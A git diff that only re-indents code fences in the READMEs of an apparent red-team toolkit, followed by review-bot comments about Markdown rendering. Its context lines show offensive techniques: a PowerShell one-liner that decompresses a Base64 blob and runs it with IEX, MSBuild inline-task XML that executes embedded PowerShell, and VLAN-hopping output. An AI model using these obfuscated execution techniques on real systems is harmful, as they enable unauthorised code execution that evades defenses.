diff --git a/networks/README.md b/networks/README.md index ff85925..ca2343b 100644 --- a/networks/README.md +++ b/networks/README.md @@ -11,7 +11,7 @@ Sample output: - ``` +``` $ ./VLANHopperDTP.py --help :: VLAN Hopping via DTP Trunk negotiation @@ -68,7 +68,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1 [+] Hopped to VLAN 20.: 172.16.20.10 [+] Hopped to VLAN 30.: 172.16.30.11 [+] Hopped to VLAN 99.: 172.16.99.10 - ``` +``` - **`nmap-grep-to-table.sh`** - Script converting nmap's greppable output (-oG) into a printable per-host tables. ([gist](https://gist.github.com/mgeeky/cd3092cf60fd513d786286a21c6fa915)) diff --git a/social-engineering/README.md b/social-engineering/README.md index b42d492..23638b7 100644 --- a/social-engineering/README.md +++ b/social-engineering/README.md @@ -8,7 +8,7 @@ Example output **not minimized**: - ``` +``` C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 :: Powershell via MSBuild inline-task XML payload generation script @@ -61,11 +61,11 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py S ------------------------------------------------------------------------------------ - ``` +``` **minimized** - ``` +``` C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 -m :: Powershell via MSBuild inline-task XML payload generation script @@ -89,7 +89,7 @@ kVG9FbmQoKTs=");string d=System.Text.Encoding.UTF8.GetString(x);Runspace r=R ();Pipeline p=r.CreatePipeline();p.Commands.AddScript(d);p.Invoke();r.Close();return true;}}]]> ------------------------------------------------------------------------------------ - ``` +``` - **`msbuild-powershell-msgbox.xml`** - Example of Powershell execution via MSBuild inline task XML file. On a simple Message-Box script. 
@@ -101,10 +101,10 @@ ngTask> Example: - ``` +``` $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA==')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); - ``` +``` - **`muti-stage-1.md`** - Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process. ([gist](https://gist.github.com/mgeeky/6097ea56e0f541aa7d98161e2aa76dfb)) diff --git a/web/README.md b/web/README.md index cee719a..3beb676 100644 --- a/web/README.md +++ b/web/README.md @@ -7,7 +7,7 @@ Sample output could look like: - ``` +``` Usage: detect.py Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4a5463794a545a6a4a5459304a5449784a5449774a544e684a544a6b4a544935" [+] Detected encoding: HexEncoded @@ -26,11 +26,11 @@ Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4 [>] Encoding HexEncoded: (Rk9PJTIwSGVsbG8lMjB3b3JsZCUyMSUyMCUzQS0lMjklMjBCQVI=) => (526b39504a544977534756736247386c4d6a423362334a735a4355794d5355794d43557a5153306c4d6a6b6c4d6a42435156493d) (3) ENCODED FORM: "526b39504a544977534756736247386c4d6a423362334a735a4355794d5355794d43557a5153306c4d6a6b6c4d6a42435156493d" - ``` +``` When `DEBUG` is turned on, the output may also look like: - ``` +``` $ ./reencode.py JTQxJTQxJTQxJTQx [.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" [.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx" 
@@ -81,7 +81,7 @@ Node('/None/Base64/URLEncoder', decoded='AAAA') (2) TO BE ENCODED TEXT: "FOO AAAA BAR" (3) ENCODED FORM: "Rk9PJTIwQUFBQSUyMEJBUg==" - ``` +``` - **`oRTC-leak-internal-ip.js`** - Internal IP address leakage via Object RTC (ORTC) interface implemented in Microsoft Edge. ([gist](https://gist.github.com/mgeeky/03f0871fb88c64b3d6d3a725c3ba38bf)) @@ -101,7 +101,7 @@ Node('/None/Base64/URLEncoder', decoded='AAAA') - **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee)) - ``` +``` # Simple utility that aids the penetration tester when manually testing Padding Oracle condition # of a target cryptosystem, by generating set of test cases to fed the cryptosystem with. # @@ -120,7 +120,7 @@ Node('/None/Base64/URLEncoder', decoded='AAAA') # This script could be then launched to generate every possible test case of second to the last block # being filled with specially tailored values (like vector of zeros with last byte ranging from 0-255) # and then used in some kind of local http proxy (burp/zap) or http client like (curl/wget). - ``` +``` - **`create_mitm_certificate.sh`** - Simple SSL/TLS self-signed CA Certificate generator for MITM purposes. ([gist](https://gist.github.com/mgeeky/5e36d6482e73ab85c161c35bfd50c465))
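Review bot: In networks/README.md (hunks @@ -11,7 and @@ -68,7) the opening and closing fences lose their leading whitespace, but the context line that follows the closing fence is the `nmap-grep-to-table.sh` bullet, so this sample output sits inside a bulleted list. A fence at column 0 ends the enclosing list item in CommonMark instead of nesting the block under it. If the old indentation was rendering as literal backticks, consider indenting both fence lines to the list item's content column rather than removing the indent entirely, and check the rendered page for this file and for the same pattern in social-engineering/README.md and web/README.md.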
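Review bot: In social-engineering/README.md hunk @@ -101,10 the block under "Example:" is a PowerShell one-liner that gunzips a Base64 string and passes the result to `IEX`, yet the re-added fence is still bare and nothing in the visible lines says what the blob decodes to. Since both fence lines are being rewritten anyway, tag the opening fence as `powershell` and add one sentence above it stating the decoded script, so a reader can review the example without executing it. The console transcripts in hunks @@ -8,7, @@ -61,11 and @@ -89,7 could take a `text` tag in the same pass to stop renderers from guessing a language.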
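Review bot: In web/README.md hunks @@ -101,7 and @@ -120,7 the fence wraps the header comment of `padding-oracle-tests.py`, and the second context line still reads "by generating set of test cases to fed the cryptosystem with". As this block is already being touched, fix that to "a set of test cases to feed the cryptosystem with", and either tag the fence `python` or drop the `#` prefixes and present the text as ordinary prose under the bullet, since it is a description rather than runnable code.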